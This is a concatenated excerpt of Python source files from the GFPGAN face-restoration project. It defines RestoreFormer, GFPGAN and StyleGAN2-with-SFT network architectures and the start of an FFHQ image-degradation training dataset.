self.down.append(down) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d( block_in, 2 * z_channels if double_z else z_channels, kernel_size=3, stride=1, padding=1) def forward(self, x): hs = {} # timestep embedding temb = None # downsampling h = self.conv_in(x) hs['in'] = h for i_level in range(self.num_resolutions): for i_block in range(self.num_res_blocks): h = self.down[i_level].block[i_block](h, temb) if len(self.down[i_level].attn) > 0: h = 
self.down[i_level].attn[i_block](h) if i_level != self.num_resolutions - 1: # hs.append(h) hs['block_' + str(i_level)] = h h = self.down[i_level].downsample(h) # middle # h = hs[-1] if self.enable_mid: h = self.mid.block_1(h, temb) hs['block_' + str(i_level) + '_atten'] = h h = self.mid.attn_1(h) h = self.mid.block_2(h, temb) hs['mid_atten'] = h # end h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) # hs.append(h) hs['out'] = h return hs class MultiHeadDecoder(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, give_pre_end=False, enable_mid=True, head_size=1, **ignorekwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.give_pre_end = give_pre_end self.enable_mid = enable_mid # compute in_ch_mult, block_in and curr_res at lowest res block_in = ch * ch_mult[self.num_resolutions - 1] curr_res = resolution // 2**(self.num_resolutions - 1) self.z_shape = (1, z_channels, curr_res, curr_res) print('Working with z of shape {} = {} dimensions.'.format(self.z_shape, np.prod(self.z_shape))) # z to block_in self.conv_in = torch.nn.Conv2d(z_channels, block_in, kernel_size=3, stride=1, padding=1) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # upsampling self.up = nn.ModuleList() for i_level in reversed(range(self.num_resolutions)): block = nn.ModuleList() attn = nn.ModuleList() block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks + 1): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) up = nn.Module() up.block = block up.attn = attn if i_level != 0: up.upsample = Upsample(block_in, resamp_with_conv) curr_res = curr_res * 2 self.up.insert(0, up) # prepend to get consistent order # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d(block_in, out_ch, kernel_size=3, stride=1, padding=1) def forward(self, z): # assert z.shape[1:] == self.z_shape[1:] self.last_z_shape = z.shape # timestep embedding temb = None # z to block_in h = self.conv_in(z) # middle if self.enable_mid: h = self.mid.block_1(h, temb) h = self.mid.attn_1(h) h = self.mid.block_2(h, temb) # upsampling for i_level in reversed(range(self.num_resolutions)): for i_block in range(self.num_res_blocks + 1): h = self.up[i_level].block[i_block](h, temb) if len(self.up[i_level].attn) > 0: h = self.up[i_level].attn[i_block](h) if i_level != 0: h = self.up[i_level].upsample(h) # end if self.give_pre_end: return h h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) return h class MultiHeadDecoderTransformer(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, give_pre_end=False, enable_mid=True, head_size=1, **ignorekwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = 
len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.give_pre_end = give_pre_end self.enable_mid = enable_mid # compute in_ch_mult, block_in and curr_res at lowest res block_in = ch * ch_mult[self.num_resolutions - 1] curr_res = resolution // 2**(self.num_resolutions - 1) self.z_shape = (1, z_channels, curr_res, curr_res) print('Working with z of shape {} = {} dimensions.'.format(self.z_shape, np.prod(self.z_shape))) # z to block_in self.conv_in = torch.nn.Conv2d(z_channels, block_in, kernel_size=3, stride=1, padding=1) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # upsampling self.up = nn.ModuleList() for i_level in reversed(range(self.num_resolutions)): block = nn.ModuleList() attn = nn.ModuleList() block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks + 1): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) up = nn.Module() up.block = block up.attn = attn if i_level != 0: up.upsample = Upsample(block_in, resamp_with_conv) curr_res = curr_res * 2 self.up.insert(0, up) # prepend to get consistent order # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d(block_in, out_ch, kernel_size=3, stride=1, padding=1) def forward(self, z, hs): # assert z.shape[1:] == self.z_shape[1:] # self.last_z_shape = z.shape # timestep embedding temb = None # z to block_in h = self.conv_in(z) # middle if self.enable_mid: h = self.mid.block_1(h, temb) h = self.mid.attn_1(h, hs['mid_atten']) h = self.mid.block_2(h, temb) # upsampling for i_level in reversed(range(self.num_resolutions)): for i_block in range(self.num_res_blocks + 1): h = self.up[i_level].block[i_block](h, temb) if len(self.up[i_level].attn) > 0: h = self.up[i_level].attn[i_block](h, hs['block_' + str(i_level) + '_atten']) # hfeature = h.clone() if i_level != 0: h = self.up[i_level].upsample(h) # end if self.give_pre_end: return h h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) return h class RestoreFormer(nn.Module): def __init__(self, n_embed=1024, embed_dim=256, ch=64, out_ch=3, ch_mult=(1, 2, 2, 4, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, in_channels=3, resolution=512, z_channels=256, double_z=False, enable_mid=True, fix_decoder=False, fix_codebook=True, fix_encoder=False, head_size=8): super(RestoreFormer, self).__init__() self.encoder = MultiHeadEncoder( ch=ch, out_ch=out_ch, ch_mult=ch_mult, num_res_blocks=num_res_blocks, attn_resolutions=attn_resolutions, dropout=dropout, in_channels=in_channels, resolution=resolution, z_channels=z_channels, double_z=double_z, enable_mid=enable_mid, head_size=head_size) self.decoder = MultiHeadDecoderTransformer( ch=ch, out_ch=out_ch, ch_mult=ch_mult, num_res_blocks=num_res_blocks, attn_resolutions=attn_resolutions, dropout=dropout, in_channels=in_channels, resolution=resolution, z_channels=z_channels, enable_mid=enable_mid, head_size=head_size) self.quantize = VectorQuantizer(n_embed, embed_dim, beta=0.25) self.quant_conv = torch.nn.Conv2d(z_channels, embed_dim, 1) self.post_quant_conv = 
torch.nn.Conv2d(embed_dim, z_channels, 1) if fix_decoder: for _, param in self.decoder.named_parameters(): param.requires_grad = False for _, param in self.post_quant_conv.named_parameters(): param.requires_grad = False for _, param in self.quantize.named_parameters(): param.requires_grad = False elif fix_codebook: for _, param in self.quantize.named_parameters(): param.requires_grad = False if fix_encoder: for _, param in self.encoder.named_parameters(): param.requires_grad = False def encode(self, x): hs = self.encoder(x) h = self.quant_conv(hs['out']) quant, emb_loss, info = self.quantize(h) return quant, emb_loss, info, hs def decode(self, quant, hs): quant = self.post_quant_conv(quant) dec = self.decoder(quant, hs) return dec def forward(self, input, **kwargs): quant, diff, info, hs = self.encode(input) dec = self.decode(quant, hs) return dec, None File: gfpgan/archs/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import arch modules for registry # scan all the files that end with '_arch.py' under the archs folder arch_folder = osp.dirname(osp.abspath(__file__)) arch_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(arch_folder) if v.endswith('_arch.py')] # import all the arch modules _arch_modules = [importlib.import_module(f'gfpgan.archs.{file_name}') for file_name in arch_filenames] File: gfpgan/archs/gfpganv1_clean_arch.py import math import random import torch from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F from .stylegan2_clean_arch import StyleGAN2GeneratorClean class StyleGAN2GeneratorCSFT(StyleGAN2GeneratorClean): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). It is the clean version without custom compiled CUDA extensions used in StyleGAN2. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, narrow=1, sft_half=False): super(StyleGAN2GeneratorCSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorCSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. 
""" # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) # the conditions may have fewer levels if i < len(conditions): # SFT part to combine the conditions if self.sft_half: # only apply SFT to half of the channels out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1) out_sft = out_sft * conditions[i - 1] + conditions[i] out = torch.cat([out_same, out_sft], dim=1) else: # apply SFT to all the channels out = out * conditions[i - 1] + conditions[i] out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None class ResBlock(nn.Module): """Residual block with bilinear upsampling/downsampling. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. mode (str): Upsampling/downsampling mode. Options: down | up. Default: down. """ def __init__(self, in_channels, out_channels, mode='down'): super(ResBlock, self).__init__() self.conv1 = nn.Conv2d(in_channels, in_channels, 3, 1, 1) self.conv2 = nn.Conv2d(in_channels, out_channels, 3, 1, 1) self.skip = nn.Conv2d(in_channels, out_channels, 1, bias=False) if mode == 'down': self.scale_factor = 0.5 elif mode == 'up': self.scale_factor = 2 def forward(self, x): out = F.leaky_relu_(self.conv1(x), negative_slope=0.2) # upsample/downsample out = F.interpolate(out, scale_factor=self.scale_factor, mode='bilinear', align_corners=False) out = F.leaky_relu_(self.conv2(out), negative_slope=0.2) # skip x = F.interpolate(x, scale_factor=self.scale_factor, mode='bilinear', align_corners=False) skip = self.skip(x) out = out + skip return out @ARCH_REGISTRY.register() class GFPGANv1Clean(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. It is the clean version without custom compiled CUDA extensions used in StyleGAN2. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. 
channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. input_is_latent (bool): Whether input is latent style. Default: False. different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, decoder_load_path=None, fix_decoder=True, # for stylegan decoder num_mlp=8, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANv1Clean, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = nn.Conv2d(3, channels[f'{first_out_size}'], 1) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels, mode='down')) in_channels = out_channels self.final_conv = nn.Conv2d(in_channels, channels['4'], 3, 1, 1) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResBlock(in_channels, out_channels, mode='up')) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(nn.Conv2d(channels[f'{2**i}'], 3, 1)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = nn.Linear(channels['4'] * 4 * 4, linear_out_channel) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorCSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( nn.Conv2d(out_channels, out_channels, 3, 1, 1), nn.LeakyReLU(0.2, True), nn.Conv2d(out_channels, 
sft_out_channels, 3, 1, 1))) self.condition_shift.append( nn.Sequential( nn.Conv2d(out_channels, out_channels, 3, 1, 1), nn.LeakyReLU(0.2, True), nn.Conv2d(out_channels, sft_out_channels, 3, 1, 1))) def forward(self, x, return_latents=False, return_rgb=True, randomize_noise=True, **kwargs): """Forward function for GFPGANv1Clean. Args: x (Tensor): Input images. return_latents (bool): Whether to return style latents. Default: False. return_rgb (bool): Whether return intermediate rgb images. Default: True. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. """ conditions = [] unet_skips = [] out_rgbs = [] # encoder feat = F.leaky_relu_(self.conv_body_first(x), negative_slope=0.2) for i in range(self.log_size - 2): feat = self.conv_body_down[i](feat) unet_skips.insert(0, feat) feat = F.leaky_relu_(self.final_conv(feat), negative_slope=0.2) # style code style_code = self.final_linear(feat.view(feat.size(0), -1)) if self.different_w: style_code = style_code.view(style_code.size(0), -1, self.num_style_feat) # decode for i in range(self.log_size - 2): # add unet skip feat = feat + unet_skips[i] # ResUpLayer feat = self.conv_body_up[i](feat) # generate scale and shift for SFT layers scale = self.condition_scale[i](feat) conditions.append(scale.clone()) shift = self.condition_shift[i](feat) conditions.append(shift.clone()) # generate rgb images if return_rgb: out_rgbs.append(self.toRGB[i](feat)) # decoder image, _ = self.stylegan_decoder([style_code], conditions, return_latents=return_latents, input_is_latent=self.input_is_latent, randomize_noise=randomize_noise) return image, out_rgbs File: gfpgan/archs/gfpgan_bilinear_arch.py import math import random import torch from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from .gfpganv1_arch import ResUpBlock from .stylegan2_bilinear_arch import (ConvLayer, EqualConv2d, EqualLinear, ResBlock, ScaledLeakyReLU, StyleGAN2GeneratorBilinear) class StyleGAN2GeneratorBilinearSFT(StyleGAN2GeneratorBilinear): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). It is the bilinear version. It does not use the complicated UpFirDnSmooth function that is not friendly for deployment. It can be easily converted to the clean version: StyleGAN2GeneratorCSFT. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, lr_mlp=0.01, narrow=1, sft_half=False): super(StyleGAN2GeneratorBilinearSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, lr_mlp=lr_mlp, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorBilinearSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. input_is_latent (bool): Whether input is latent style. Default: False. 
noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) # the conditions may have fewer levels if i < len(conditions): # SFT part to combine the conditions if self.sft_half: # only apply SFT to half of the channels out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1) out_sft = out_sft * conditions[i - 1] + conditions[i] out = torch.cat([out_same, out_sft], dim=1) else: # apply SFT to all the channels out = out * conditions[i - 1] + conditions[i] out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None @ARCH_REGISTRY.register() class GFPGANBilinear(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. It is the bilinear version and it does not use the complicated UpFirDnSmooth function that is not friendly for deployment. It can be easily converted to the clean version: GFPGANv1Clean. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. input_is_latent (bool): Whether input is latent style. Default: False. 
different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, decoder_load_path=None, fix_decoder=True, # for stylegan decoder num_mlp=8, lr_mlp=0.01, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANBilinear, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = ConvLayer(3, channels[f'{first_out_size}'], 1, bias=True, activate=True) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels)) in_channels = out_channels self.final_conv = ConvLayer(in_channels, channels['4'], 3, bias=True, activate=True) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResUpBlock(in_channels, out_channels)) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(EqualConv2d(channels[f'{2**i}'], 3, 1, stride=1, padding=0, bias=True, bias_init_val=0)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = EqualLinear( channels['4'] * 4 * 4, linear_out_channel, bias=True, bias_init_val=0, lr_mul=1, activation=None) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorBilinearSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, lr_mlp=lr_mlp, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=1))) self.condition_shift.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, 
bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0))) def forward(self, x, return_latents=False, return_rgb=True, randomize_noise=True): """Forward function for GFPGANBilinear. Args: x (Tensor): Input images. return_latents (bool): Whether to return style latents. Default: False. return_rgb (bool): Whether return intermediate rgb images. Default: True. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. """ conditions = [] unet_skips = [] out_rgbs = [] # encoder feat = self.conv_body_first(x) for i in range(self.log_size - 2): feat = self.conv_body_down[i](feat) unet_skips.insert(0, feat) feat = self.final_conv(feat) # style code style_code = self.final_linear(feat.view(feat.size(0), -1)) if self.different_w: style_code = style_code.view(style_code.size(0), -1, self.num_style_feat) # decode for i in range(self.log_size - 2): # add unet skip feat = feat + unet_skips[i] # ResUpLayer feat = self.conv_body_up[i](feat) # generate scale and shift for SFT layers scale = self.condition_scale[i](feat) conditions.append(scale.clone()) shift = self.condition_shift[i](feat) conditions.append(shift.clone()) # generate rgb images if return_rgb: out_rgbs.append(self.toRGB[i](feat)) # decoder image, _ = self.stylegan_decoder([style_code], conditions, return_latents=return_latents, input_is_latent=self.input_is_latent, randomize_noise=randomize_noise) return image, out_rgbs File: gfpgan/data/ffhq_degradation_dataset.py import cv2 import math import numpy as np import os.path as osp import torch import torch.utils.data as data from basicsr.data import degradations as degradations from basicsr.data.data_util import paths_from_folder from basicsr.data.transforms import augment from basicsr.utils import FileClient, get_root_logger, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torchvision.transforms.functional import (adjust_brightness, adjust_contrast, adjust_hue, adjust_saturation, normalize) @DATASET_REGISTRY.register() class FFHQDegradationDataset(data.Dataset): """FFHQ dataset for GFPGAN. It reads high resolution images, and then generate low-quality (LQ) images on-the-fly. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. io_backend (dict): IO backend type and other kwarg. mean (list | tuple): Image mean. std (list | tuple): Image std. use_hflip (bool): Whether to horizontally flip. Please see more options in the codes. 
""" def __init__(self, opt): super(FFHQDegradationDataset, self).__init__() self.opt = opt # file client (io backend) self.file_client = None self.io_backend_opt = opt['io_backend'] self.gt_folder = opt['dataroot_gt'] self.mean = opt['mean'] self.std = opt['std'] self.out_size = opt['out_size'] self.crop_components = opt.get('crop_components', False) # facial components self.eye_enlarge_ratio = opt.get('eye_enlarge_ratio', 1) # whether enlarge eye regions if self.crop_components: # load component list from a pre-process pth files self.components_list = torch.load(opt.get('component_path')) # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = self.gt_folder if not self.gt_folder.endswith('.lmdb'): raise ValueError(f"'dataroot_gt' should end with '.lmdb', but received {self.gt_folder}") with open(osp.join(self.gt_folder, 'meta_info.txt')) as fin: self.paths = [line.split('.')[0] for line in fin] else: # disk backend: scan file list from a folder self.paths = paths_from_folder(self.gt_folder) # degradation configurations self.blur_kernel_size = opt['blur_kernel_size'] self.kernel_list = opt['kernel_list'] self.kernel_prob = opt['kernel_prob'] self.blur_sigma = opt['blur_sigma'] self.downsample_range = opt['downsample_range'] self.noise_range = opt['noise_range'] self.jpeg_range = opt['jpeg_range'] # color jitter self.color_jitter_prob = opt.get('color_jitter_prob') self.color_jitter_pt_prob = opt.get('color_jitter_pt_prob') self.color_jitter_shift = opt.get('color_jitter_shift', 20) # to gray self.gray_prob = opt.get('gray_prob') logger = get_root_logger() logger.info(f'Blur: blur_kernel_size {self.blur_kernel_size}, sigma: [{", ".join(map(str, self.blur_sigma))}]') logger.info(f'Downsample: downsample_range [{", ".join(map(str, self.downsample_range))}]') logger.info(f'Noise: [{", ".join(map(str, self.noise_range))}]') logger.info(f'JPEG compression: [{", ".join(map(str, self.jpeg_range))}]') if self.color_jitter_prob is not None: logger.info(f'Use random color jitter. Prob: {self.color_jitter_prob}, shift: {self.color_jitter_shift}') if self.gray_prob is not None: logger.info(f'Use random gray. Prob: {self.gray_prob}') self.color_jitter_shift /= 255. 
